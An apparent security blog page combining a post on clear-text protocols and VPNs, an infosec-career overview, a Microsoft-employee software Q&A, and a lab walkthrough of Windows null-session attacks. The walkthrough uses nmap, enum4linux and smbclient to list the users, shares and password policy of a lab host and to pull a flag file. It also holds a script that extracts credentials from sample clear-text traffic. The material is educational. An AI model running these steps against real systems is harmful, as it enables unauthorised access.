
OUR TEAM

The awesome people behind our brand ... and their life motto.

  • Kumar Atul Jaiswal

    Ethical Hacker

    Hacking is a Speed of Innovation And Technology with Romance.

  • Kumar Atul Jaiswal

    CEO Of Hacking Truth

    Loopholes are every major security, just need to understand it well.

  • Kumar Atul Jaiswal

    Web Developer

    Technology is the best way to change everything, like mindset and goal.

PORTFOLIO


  • About Cryptography and VPNs

     



    A clear-text protocol carries data over the network without any transformation or encryption. An attacker who can see the traffic can eavesdrop on the communication, which is an unwanted attack in itself.
     

     



    Because the data is sent exactly as written, in a human-readable form, a clear-text protocol can be intercepted, eavesdropped on and mangled very easily: nothing that travels over the network, public or private, is encrypted. If there is absolutely no alternative to a clear-text protocol, you should use it only on a trusted network.


    A cryptographic protocol protects the data it carries over a network by encrypting it. Cryptographic protocols have many different goals; one of them is to prevent eavesdropping.

    Eavesdropping, also known as a sniffing or snooping attack, is the theft of information as it is transmitted over the network by a computer, smartphone or another connected device: the attacker takes advantage of unsecured network communications to access data as it is being sent or received by its user.


    If an attacker intercepts encrypted traffic, they will not be able to understand it.
     

     


     


    If you need to transmit private information such as a username and password, you should always use a cryptographic protocol, which allows communication over the network with tight security.

    What if you need to run a clear-text protocol on an untrusted network?

    You can wrap (tunnel) the clear-text protocol inside a cryptographic one.


    A great example of protocol tunneling is a VPN.

    A Virtual Private Network (VPN) uses cryptography to extend a private network over a public one, such as the internet. The extension is made by establishing a protected connection to the private network (for example your office or home network). From the client's point of view, being in the VPN is the same as being directly connected to the private network.
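    To make the eavesdropping point concrete, here is a small audit script, added as an example and not part of the original post, that goes through captured application payloads (constructed samples, not real traffic) and reports every credential a passive observer could read: the FTP, HTTP Basic and Telnet exchanges give up the username and password outright, while the TLS record fragment stays opaque.

```python
import base64
import re
from dataclasses import dataclass
from typing import List, Tuple

# Constructed sample application payloads, as a passive observer on the wire would
# see them. Each entry is (transport, raw bytes). The last one is an opaque TLS
# record fragment: the cryptographic protocol leaves nothing readable.
CAPTURED_PAYLOADS: List[Tuple[str, bytes]] = [
    ("tcp/21", b"220 ftp ready\r\nUSER frank\r\nPASS Winter2021!\r\n"),
    ("tcp/80", b"GET /admin HTTP/1.1\r\nHost: intranet.example\r\n"
               b"Authorization: Basic " + base64.b64encode(b"netadmin:hunter2") + b"\r\n\r\n"),
    ("tcp/23", b"login: frank\r\nPassword: Winter2021!\r\n"),
    ("tcp/443", bytes.fromhex("16030300410100003d03038f2ac1e7b94d0f6a22e5")),
]


@dataclass(frozen=True)
class Finding:
    transport: str
    protocol: str
    username: str
    secret: str


# Clear-text authentication patterns of three common protocols.
FTP_USER = re.compile(rb"^USER (\S+)\r?$", re.M)
FTP_PASS = re.compile(rb"^PASS (\S+)\r?$", re.M)
HTTP_BASIC = re.compile(rb"^Authorization:\s*Basic\s+([A-Za-z0-9+/=]+)\r?$", re.M | re.I)
TELNET_LOGIN = re.compile(rb"login:\s*(\S+)\r?\n.*?Password:\s*(\S+)\r?$", re.M | re.S | re.I)


def is_cleartext(payload: bytes, threshold: float = 0.9) -> bool:
    """Heuristic: clear-text protocol data is almost entirely printable ASCII,
    while an encrypted record looks like random bytes."""
    if not payload:
        return False
    printable = sum(1 for b in payload if 32 <= b < 127 or b in (9, 10, 13))
    return printable / len(payload) >= threshold


def find_exposed_credentials(transport: str, payload: bytes) -> List[Finding]:
    """Return every credential a passive observer could read from one payload."""
    findings: List[Finding] = []
    if not is_cleartext(payload):
        return findings  # opaque to the eavesdropper: nothing to recover

    user, password = FTP_USER.search(payload), FTP_PASS.search(payload)
    if user and password:
        findings.append(Finding(transport, "ftp", user.group(1).decode(), password.group(1).decode()))

    for match in HTTP_BASIC.finditer(payload):
        try:
            creds = base64.b64decode(match.group(1), validate=True).decode()
        except (ValueError, UnicodeDecodeError):
            continue  # malformed header, not a usable credential
        name, _, secret = creds.partition(":")
        findings.append(Finding(transport, "http-basic", name, secret))

    login = TELNET_LOGIN.search(payload)
    if login:
        findings.append(Finding(transport, "telnet", login.group(1).decode(), login.group(2).decode()))
    return findings


def audit(captured: List[Tuple[str, bytes]]) -> List[Finding]:
    """Audit a whole capture. Every Finding is a credential that should have travelled
    over a cryptographic protocol (or through a VPN tunnel) instead."""
    return [f for transport, payload in captured for f in find_exposed_credentials(transport, payload)]


if __name__ == "__main__":
    for f in audit(CAPTURED_PAYLOADS):
        print(f"{f.transport:8} {f.protocol:11} user={f.username!r} secret exposed in clear text")
```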



    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. we do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.
     

     

     

  • Information Security Field

     

     



    Information security is a deep well, because most people in the world prefer to use computers rather than understand how they work, let alone the ways in which their security can be broken.

    The term hacker was born in the sixties in the MIT community. In such people we can recognise an inner curiosity; they were highly intelligent and strongly motivated.


    The world of infosec is made of hackers: people who stay curious about computer systems, who bypass restrictions in new ways that even the software vendors and programmers did not foresee, and who understand the security pitfalls of any kind of implementation.


    Being able to attack also means having an in-depth understanding of the techniques and workings of the target system. To be a hacker you need the hunger that is present in successful hackers today. Hackers explore and improve their skills daily.

    There is always something new to learn, something interesting to try, something exciting to study.

    NOTE- The history of hacking could be a complete book in itself.

    If you search for the word hacking on the internet, you will get results from every corner of the world of hacking.

    Hacking is more of an approach or a lifestyle, one that has been applied to telephone lines, to people and to software development.


    Becoming an information security professional means acquiring the knowledge of hacking honestly, and never ceasing to challenge yourself and your colleagues.


    Nowadays big companies and governments store and process all kinds of confidential data using advanced technology on computers and mobile devices.

    The data is not only stored but also has to be transmitted from private networks to public networks or other computers, so it is a must to protect sensitive information. Companies pay a premium to safeguard their data and ensure that their systems are protected, or at least they should.


    Also read - CEHv10 Pentesting



    Career opportunities


    An even more important sector is national cyber security. Governments have to face a broad range of cyber threats: global cyber syndicates, hackers for hire, activists, terrorists and state-sponsored hackers.

    With critical infrastructure like power plants, trains, aeroplanes and dams being controlled by computers, using hacking skills for good has become critical for the safety of nations.

    Companies and governments need to implement hardware and software defence systems to protect their digital assets.



    At the same time, they are required to train every single employee in the organisation so that:

    # Secure applications are developed,
    # Proper defensive measures are taken, and
    # Proper use of the company's data is in place.



    IT security is a very difficult game. One way to ensure that a system is secure from cyber threats is to hire a penetration tester.



    Penetration testers, also known as pentesters, are professionals hired to simulate a hacking attack against a network, a computer system, a web application or the entire organisation.

    They master the same tools and techniques that malicious hackers use, in order to discover any and all vulnerabilities in the systems they test.



    Also read - CEHv10 Terminologies





    These highly skilled professionals often work:

    # As freelancers,
    # In an IT security services company,
    # From home.


    Moreover, as IT is a broad knowledge domain, they can specialize in specific infosec sectors such as:

    # System attacks
    # Web application attacks
    # Malware analysis
    # Reverse engineering
    # Android applications
    # Others


    Passion, skill and hunger for knowledge are essential for a successful pentesting career.


    Also read - What is Hacking ? is it illegal or legal ?



    Information Security Terms

    Speaking the domain language is fundamental in any field: it helps you better understand the industry and communicate with your colleagues.

     

    Also read - Information security terms

     

    Root or Administrator

    The root or Administrator users are the users who manage IT networks or single systems. They have the maximum privileges over a system.


     

    Privileges

    In a computer system, privileges identify the actions that a user is allowed to perform. The higher the privileges, the more control over the system a user has. Privilege escalation is an attack where a malicious user gains elevated privileges over a system.


     

    Also read - DOS and DDOS Attack

     

     

    Remote Code Execution


    During a remote code execution attack a malicious user manages to execute attacker-controlled code on a remote victim machine. A remote code execution vulnerability is very dangerous because it can be exploited over the network by a remote attacker.

     

    Also read - RCE practical here

     

     

    ShellCode


    A shellcode is a piece of custom code which provides the attacker with a shell on the victim machine. Shellcodes are generally used during remote code execution attacks.

     

     



  • Will Microsoft employees receive free Microsoft software?

     



    Do Microsoft employees get free Microsoft software?


    Yes. In most cases, Microsoft employees get to use Microsoft software for free.

    The company has certain policies around it, but a simplified takeaway is: as long as the Microsoft software is not used to make money and is used by the employee himself, no matter at work or at home, on work machines or on home machines, for business purposes or personal use, the employee doesn't have to pay for the software.


    Examples:


    # Windows is free to employees. You can bring your personal laptops to office and install Windows from corpnet. You can get a key from an internal IT site and use that to activate the Windows. There is a cap on the max number of keys every employee can request, though. I have never hit the cap, btw.

    # Same to Office. Just bring your machine to office and install from intranet. You can also VPN from home to corpnet and install it to home machine.

    # Visual Studio is free. All SKUs, including the Ultimate.

    # SQL Server is free.

    # Other server products like Sharepoint, Exchange, etc. If you were to build your own personal site using Sharepoint, you don't have to pay for the software -- it's just that few people are hosting Sharepoint and Exchange outside of office for their personal use.

    # Employee gets MSDN subscription for free. You can download Windows and other software from MSDN subscription, along with the activation key. MSDN subscription also gives an Azure subscription for free (with some monetary cap).
     
    # Employee can get internal consumption Azure subscription. All cost on the subscription goes to your cost center (meaning: your department pays for it). There is no monetary cap on such subscriptions, though the subscription itself is subject to a common quota, such as no more than N cores for virtual machines. As far as I remember, N is probably 350 (maybe less).

    # Under the internal consumption Azure subscription, employees get unlimited hours of build time in Visual Studio Online.




    Exceptions:


    # Games are not free. Including PC games (e.g. Flight Simulation) and XBox games.
    # Some less widely used softwares, such as Streets and Trips (discontinued).
    # Office for Mac. People who write products for Mac get those for free. But not everybody.


    But some of the games made by Microsoft can be bought from the company store at a quite deep discount. But you can't resell them. There were people reselling Windows they bought from the company store and they went to jail.


    Disclosure and credibility: Eric Zheng has worked at Microsoft for 13 years.

    Thanks for your time Mr. Eric Zheng.









  • Eliminate Your Fears And Doubts About Null Session Attack

     

    https://www.kumaratuljaiswal.in

     

     

    The final goal of this blog post is to show you how to retrieve information from the target machine such as shares, users, groups and so on. Moreover, by navigating the remote machine, you should be able to find a file named "Congratulations.txt". Download it and explore its content.



    A Windows machine can share a file or a directory on the network; this lets local and remote users access the resource and, possibly, modify it.


    Example


    A file server in an office lets users open and edit the documents of their own department, while it lets everyone read, but not modify, public information files.

    This feature is very useful in a network environment. The ability to share resources and files reduces redundancy and can improve work efficiency in a company. Shares can be either extremely useful if used properly or extremely dangerous when configured improperly. Creating network shares in a Windows-based environment is fairly easy: generally users just need to turn on the File and Printer Sharing service and then they can start sharing directories or files.

    Users can also set permissions on a share, choosing who can perform operations such as reading, writing and modifying permissions. Depending on the Windows version, users can choose to share a single file or use the Public directory. When sharing a single file they can choose the local or remote users to share the file with. When using the Public directory they can choose which local users can access the files on the share, but they can only allow everyone or no one on the network to access the share.




    An authorised user can access share by using universal naming convention path (UNC path).


    The Format of a UNC path is-

    \\ServerName\ShareName\file.nat



    Administrative shares


    There are also some special default administrative shares which are used by system administrators and Windows itself:

    \\ComputerName\C$ lets an administrator access a volume on the local machine. Every volume has a share (C$, D$, E$, etc.).

    \\ComputerName\admin$ points to the Windows installation directory.

    \\ComputerName\ipc$ is used for inter-process communication. You cannot browse it via Windows Explorer.



    You can test the volume share and the admin$ share on your computer by entering the following in the Windows Explorer address bar:


    \\localhost\<sharename>

    \\localhost\d$

     

     


    Null session attacks can be used to enumerate quite a lot of information. Attackers can steal information about:


    # Passwords
    # System Users
    # System Group
    # Running system processes


    Null sessions are remotely exploitable: this means that attackers can use their own computers to attack a vulnerable Windows machine. Moreover, they can be used to call remote APIs and remote procedure calls. Because of these factors, null session attacks had a huge impact on the Windows ecosystem.

    Nowadays Windows is configured to be immune from this kind of attack. However, legacy hosts can still be vulnerable.

    A null session is a vulnerability affecting Windows administrative shares: it lets an attacker connect to a local or remote share without authentication.

    We will go through the enumeration of Windows shares and their exploitation using various techniques and tools.




    Tools


    The best tools for this lab are:

    # enum4linux
    # samrdump
    # smbclient



    Steps


    # Find a target in the network
    # Check for null session
    # Exploit null session

    It's time to get our hands dirty.



    # Gather information with enum4linux

    Use enum4linux and gather the following information:

    # Shares
    # Users
    # Password policies
    # Groups



    Use smbclient to navigate the target machine

    Mount or use the smbclient interactive command line in order to navigate the remote machine and find and inspect the content of the Congratulations.txt file.



    Find a target in the network


    We first need to identify the remote network. We can do it by running ifconfig and checking the IP address of our tap0 interface.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ ifconfig
    eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
            ether b4:b6:86:47:55:83  txqueuelen 1000  (Ethernet)
            RX packets 0  bytes 0 (0.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 0  bytes 0 (0.0 B)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
            inet 127.0.0.1  netmask 255.0.0.0
            inet6 ::1  prefixlen 128  scopeid 0x10<host>
            loop  txqueuelen 1000  (Local Loopback)
            RX packets 2201  bytes 96326 (94.0 KiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 2201  bytes 96326 (94.0 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    tap0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.99.101  netmask 255.255.255.0  broadcast 0.0.0.0
            inet6 fe80::5044:42ff:fe4d:3eb6  prefixlen 64  scopeid 0x20<link>
            ether 52:44:42:4d:3e:b6  txqueuelen 1000  (Ethernet)
            RX packets 3  bytes 363 (363.0 B)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 522  bytes 22356 (21.8 KiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    wlan0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
            inet 192.168.98.25  netmask 255.255.255.0  broadcast 192.168.98.255
            inet6 2409:4064:95:e81b:3e1a:d593:a513:ecb9  prefixlen 64  scopeid 0x0<global>
            inet6 fe80::aa80:f129:e78d:aa96  prefixlen 64  scopeid 0x20<link>
            ether fc:01:7c:29:00:77  txqueuelen 1000  (Ethernet)
            RX packets 92211  bytes 102634365 (97.8 MiB)
            RX errors 0  dropped 0  overruns 0  frame 0
            TX packets 55571  bytes 9521350 (9.0 MiB)
            TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    



    As we can see, the target network is 192.168.99.0/24 (note that your IP address may differ from the one in the previous output). Let's run nmap in order to discover live hosts on the network:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo nmap -sn 192.168.99.0/24
    Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-26 21:02 IST
    Nmap scan report for 192.168.99.162
    Host is up (0.53s latency).
    MAC Address: 00:50:56:A5:DF:D7 (VMware)
    Nmap scan report for 192.168.99.101
    Host is up.
    Nmap done: 256 IP addresses (2 hosts up) scanned in 18.25 seconds
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    




    The previous screenshot shows that the only host alive on the network is 192.168.99.162 (besides our host: 192.168.99.20).


    Check for null session


    Let us target the host found in the previous step and check if it is vulnerable to null sessions. In the following screenshot, we are using enum4linux, but you can use any tool you prefer.


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -n 192.168.99.162                                                                                                255 ⨯
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:03:21 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    enum4linux complete on Sun Dec 26 21:03:38 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    



    We can see that the File Server Service is active and the string <20> appears in the list.



    Exploit null session

    It is time to get our hands dirty!



    Gather information with enum4linux

    Let us try to gather as much information as we can. To do this we can simply run enum4linux with the -a switch:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ enum4linux -a 192.168.99.162
    Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Dec 26 21:05:14 2021
    
     ========================== 
    |    Target Information    |
     ========================== 
    Target ........... 192.168.99.162
    RID Range ........ 500-550,1000-1050
    Username ......... ''
    Password ......... ''
    Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
    
    
     ====================================================== 
    |    Enumerating Workgroup/Domain on 192.168.99.162    |
     ====================================================== 
    [+] Got domain/workgroup name: WORKGROUP
    
     ============================================== 
    |    Nbtstat Information for 192.168.99.162    |
     ============================================== 
    Looking up status of 192.168.99.162
            ELS-WINXP       <00> -         B <ACTIVE>  Workstation Service
            WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
            ELS-WINXP       <20> -         B <ACTIVE>  File Server Service
            WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
            WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
            ..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
    
            MAC Address = 00-50-56-A5-DF-D7
    
     ======================================= 
    |    Session Check on 192.168.99.162    |
     ======================================= 
    [+] Server 192.168.99.162 allows sessions using username '', password ''
    
     ============================================= 
    |    Getting domain SID for 192.168.99.162    |
     ============================================= 
    Domain Name: WORKGROUP
    Domain Sid: (NULL SID)
    [+] Can't determine if host is part of domain or part of a workgroup
    
     ======================================== 
    |    OS information on 192.168.99.162    |
     ======================================== 
    Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
    [+] Got OS info for 192.168.99.162 from smbclient: 
    [+] Got OS info for 192.168.99.162 from srvinfo:
            192.168.99.162 Wk Sv NT PtB LMB     
            platform_id     :       500
            os version      :       5.1
            server type     :       0x51003
    
     =============================== 
    |    Users on 192.168.99.162    |
     =============================== 
    index: 0x1 RID: 0x1f4 acb: 0x00000210 Account: Administrator    Name: (null)    Desc: Built-in account for administering the computer/domain
    index: 0x2 RID: 0x3eb acb: 0x00000210 Account: eLS      Name: (null)    Desc: (null)
    index: 0x3 RID: 0x3ed acb: 0x00000210 Account: Frank    Name: Frank     Desc: (null)
    index: 0x4 RID: 0x1f5 acb: 0x00000214 Account: Guest    Name: (null)    Desc: Built-in account for guest access to the computer/domain
    index: 0x5 RID: 0x3e8 acb: 0x00000211 Account: HelpAssistant    Name: Remote Desktop Help Assistant Account     Desc: Account for Providing Remote Assistance
    index: 0x6 RID: 0x3ec acb: 0x00000210 Account: netadmin Name: netadmin  Desc: (null)
    index: 0x7 RID: 0x3ea acb: 0x00000211 Account: SUPPORT_388945a0 Name: CN=Microsoft Corporation,L=Redmond,S=Washington,C=US      Desc: This is a vendor's account for the Help and Support Service
    
    user:[Administrator] rid:[0x1f4]
    user:[eLS] rid:[0x3eb]
    user:[Frank] rid:[0x3ed]
    user:[Guest] rid:[0x1f5]
    user:[HelpAssistant] rid:[0x3e8]
    user:[netadmin] rid:[0x3ec]
    user:[SUPPORT_388945a0] rid:[0x3ea]
    
     =========================================== 
    |    Share Enumeration on 192.168.99.162    |
     =========================================== 
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    
    [+] Attempting to map shares on 192.168.99.162
    //192.168.99.162/IPC$   Mapping: OK     Listing: DENIED
    //192.168.99.162/Frank  Mapping: OK     Listing: DENIED
    //192.168.99.162/C      [E] Can't understand response:
      AUTOEXEC.BAT                        A        0  Fri Feb 13 06:20:47 2015
      boot.ini                           HS      211  Fri Feb 13 06:16:17 2015
      CONFIG.SYS                          A        0  Fri Feb 13 06:20:47 2015
      Documents and Settings              D        0  Wed Feb 18 14:55:58 2015
      IO.SYS                           AHSR        0  Fri Feb 13 06:20:47 2015
      MSDOS.SYS                        AHSR        0  Fri Feb 13 06:20:47 2015
      NTDETECT.COM                     AHSR    47564  Tue Aug  3 22:38:34 2004
      ntldr                            AHSR   250032  Tue Aug  3 22:59:34 2004
      pagefile.sys                      AHS 805306368  Thu Dec 23 22:59:58 2021
      Program Files                      DR        0  Mon Oct  3 21:40:27 2016
      System Volume Information         DHS        0  Fri Feb 13 06:24:12 2015
      WINDOWS                             D        0  Mon Oct  3 21:42:49 2016
    
                    785224 blocks of size 4096. 345608 blocks available
    //192.168.99.162/WorkSharing    Mapping: OK, Listing: OK
    //192.168.99.162/FrankDocs      Mapping: OK     Listing: DENIED
    //192.168.99.162/ADMIN$ Mapping: DENIED, Listing: N/A
    //192.168.99.162/C$     Mapping: DENIED, Listing: N/A
    
     ====================================================== 
    |    Password Policy Information for 192.168.99.162    |
     ====================================================== 
    
    
    [+] Attaching to 192.168.99.162 using a NULL share
    
    [+] Trying protocol 139/SMB...
    
            [!] Protocol failed: Cannot request session (Called Name:192.168.99.162)
    
    [+] Trying protocol 445/SMB...
    
    [+] Found domain(s):
    
            [+] ELS-WINXP
            [+] Builtin
    
    [+] Password Info for Domain: ELS-WINXP
    
            [+] Minimum password length: None
            [+] Password history length: None
            [+] Maximum password age: 42 days 22 hours 47 minutes 
            [+] Password Complexity Flags: 000000
    
                    [+] Domain Refuse Password Change: 0
                    [+] Domain Password Store Cleartext: 0
                    [+] Domain Password Lockout Admins: 0
                    [+] Domain Password No Clear Change: 0
                    [+] Domain Password No Anon Change: 0
                    [+] Domain Password Complex: 0
    
            [+] Minimum password age: None
            [+] Reset Account Lockout Counter: 30 minutes 
            [+] Locked Account Duration: 30 minutes 
            [+] Account Lockout Threshold: None
            [+] Forced Log off Time: Not Set
    
    
    [+] Retieved partial password policy with rpcclient:
    
    Password Complexity: Disabled
    Minimum Password Length: 0
    
    
     ================================ 
    |    Groups on 192.168.99.162    |
     ================================ 
    
    [+] Getting builtin groups:
    group:[Administrators] rid:[0x220]
    group:[Backup Operators] rid:[0x227]
    group:[Guests] rid:[0x222]
    group:[Network Configuration Operators] rid:[0x22c]
    group:[Power Users] rid:[0x223]
    group:[Remote Desktop Users] rid:[0x22b]
    group:[Replicator] rid:[0x228]
    group:[Users] rid:[0x221]
    
    [+] Getting builtin group memberships:
    Group 'Users' (RID: 545) has member: NT AUTHORITY\INTERACTIVE
    Group 'Users' (RID: 545) has member: NT AUTHORITY\Authenticated Users
    Group 'Users' (RID: 545) has member: ELS-WINXP\netadmin
    Group 'Users' (RID: 545) has member: ELS-WINXP\Frank
    Group 'Guests' (RID: 546) has member: ELS-WINXP\Guest
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\Administrator
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\eLS
    Group 'Administrators' (RID: 544) has member: ELS-WINXP\netadmin
    
    [+] Getting local groups:
    group:[HelpServicesGroup] rid:[0x3e9]
    
    [+] Getting local group memberships:
    Group 'HelpServicesGroup' (RID: 1001) has member: ELS-WINXP\SUPPORT_388945a0
    
    [+] Getting domain groups:
    group:[None] rid:[0x201]
    
    [+] Getting domain group memberships:
    Group 'None' (RID: 513) has member: ELS-WINXP\Administrator
    Group 'None' (RID: 513) has member: ELS-WINXP\Guest
    Group 'None' (RID: 513) has member: ELS-WINXP\HelpAssistant
    Group 'None' (RID: 513) has member: ELS-WINXP\SUPPORT_388945a0
    Group 'None' (RID: 513) has member: ELS-WINXP\eLS
    Group 'None' (RID: 513) has member: ELS-WINXP\netadmin
    Group 'None' (RID: 513) has member: ELS-WINXP\Frank
    
     ========================================================================= 
    |    Users on 192.168.99.162 via RID cycling (RIDS: 500-550,1000-1050)    |
     ========================================================================= 
    [E] Couldn't get SID: NT_STATUS_ACCESS_DENIED.  RID cycling not possible.
    [I] Found new SID: S-1-5-32
    [I] Found new SID: S-1-5-21-823518204-2025429265-839522115
    [+] Enumerating users using SID S-1-5-32 and logon username '', password ''
    [+] Enumerating users using SID S-1-5-21-823518204-2025429265-839522115 and logon username '', password ''
    
     =============================================== 
    |    Getting printer info for 192.168.99.162    |
     =============================================== 
    Cannot connect to server.  Error was NT_STATUS_NETWORK_UNREACHABLE
    
    
    enum4linux complete on Sun Dec 26 22:35:32 2021
    
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    
    
    


    As we can see in the previous screenshots, we were able to gather a lot of information from the machine.
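    Added example, not part of the original post: a small Python audit that parses the "[+] Password Info for Domain" block enum4linux printed above and flags the settings that make online password guessing cheap (no minimum length, no complexity, no lockout). The sample text is constructed from the values shown on this page and the baseline numbers are assumed for illustration.

```python
"""Audit the password-policy block printed by enum4linux.

Added example (not from the original post). It re-implements, as code,
the checks a reviewer does by eye on the '[+] Password Info for Domain'
section: unset values are printed as 'None' / 'Not Set' by enum4linux.
"""
import re

# Constructed sample: the policy lines enum4linux printed for ELS-WINXP above.
SAMPLE_POLICY = """\
[+] Password Info for Domain: ELS-WINXP

        [+] Minimum password length: None
        [+] Password history length: None
        [+] Maximum password age: 42 days 22 hours 47 minutes
        [+] Password Complexity Flags: 000000

                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes
        [+] Locked Account Duration: 30 minutes
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: Not Set
"""

# Assumed baseline for illustration; adjust to the local policy.
BASELINE = {
    "min_length": 12,         # characters
    "history": 5,             # remembered passwords
    "lockout_threshold": 10,  # failed attempts before lockout
}

# One "[+] key: value" line; leading whitespace is ignored by search().
_LINE = re.compile(r"\[\+\]\s*(?P<key>[^:]+):\s*(?P<value>.*)$")


def parse_policy(text):
    """Return {setting name: raw value string} from enum4linux output."""
    policy = {}
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            policy[m.group("key").strip()] = m.group("value").strip()
    return policy


def as_int(value):
    """Unset settings ('None', 'Not Set') count as 0; '42 days ...' -> 42."""
    if value in ("None", "Not Set", ""):
        return 0
    return int(value.split()[0])


def audit_policy(text, baseline=BASELINE):
    """Compare the parsed policy with the baseline; return a list of findings."""
    p = parse_policy(text)
    findings = []
    if as_int(p.get("Minimum password length", "None")) < baseline["min_length"]:
        findings.append("minimum password length below baseline")
    if as_int(p.get("Password history length", "None")) < baseline["history"]:
        findings.append("password history too short or unset")
    if p.get("Domain Password Complex", "0") == "0":
        findings.append("password complexity not enforced")
    threshold = as_int(p.get("Account Lockout Threshold", "None"))
    if threshold == 0 or threshold > baseline["lockout_threshold"]:
        findings.append("no usable account lockout: unlimited online guessing")
    return findings


if __name__ == "__main__":
    for finding in audit_policy(SAMPLE_POLICY):
        print("[!]", finding)
```

On the policy above every check fires, which is exactly why a dictionary attack against this host has no lockout to worry about.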




    Use smbclient to navigate the target machine


    A very useful tool that we can use to access remote shares and browse the remote machine is smbclient.

    First let us get the list of shares using smbclient:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient -L WORKGROUP -I 192.168.99.162  -N -U ""
    
            Sharename       Type      Comment
            ---------       ----      -------
            My Documents    Disk      
            IPC$            IPC       Remote IPC
            Frank           Disk      
            C               Disk      
            WorkSharing     Disk      
            FrankDocs       Disk      
            ADMIN$          Disk      Remote Admin
            C$              Disk      Default share
    Reconnecting with SMB1 for workgroup listing.
    
            Server               Comment
            ---------            -------
    
            Workgroup            Master
            ---------            -------
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ 
    
    

    Let us now try to access the WorkSharing share and see what files are stored in there:


    ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/Penetration-tester-jr]
    └─$ sudo smbclient \\\\192.168.99.162\\WorkSharing -N                                                                             1 ⨯
    Try "help" to get a list of possible commands.
    smb: \> ls
      .                                   D        0  Wed Feb 18 16:37:31 2015
      ..                                  D        0  Wed Feb 18 16:37:31 2015
      Congratulations.txt                 A       66  Wed Feb 18 15:11:59 2015
    
                    785224 blocks of size 4096. 345613 blocks available
    smb: \> 
    smb: \> get congratulations.txt /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt
    getting file \congratulations.txt of size 66 as /home/hackerboy/Desktop/Penetration-tester-jr/congratulations.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
    smb: \> 
    
    
    







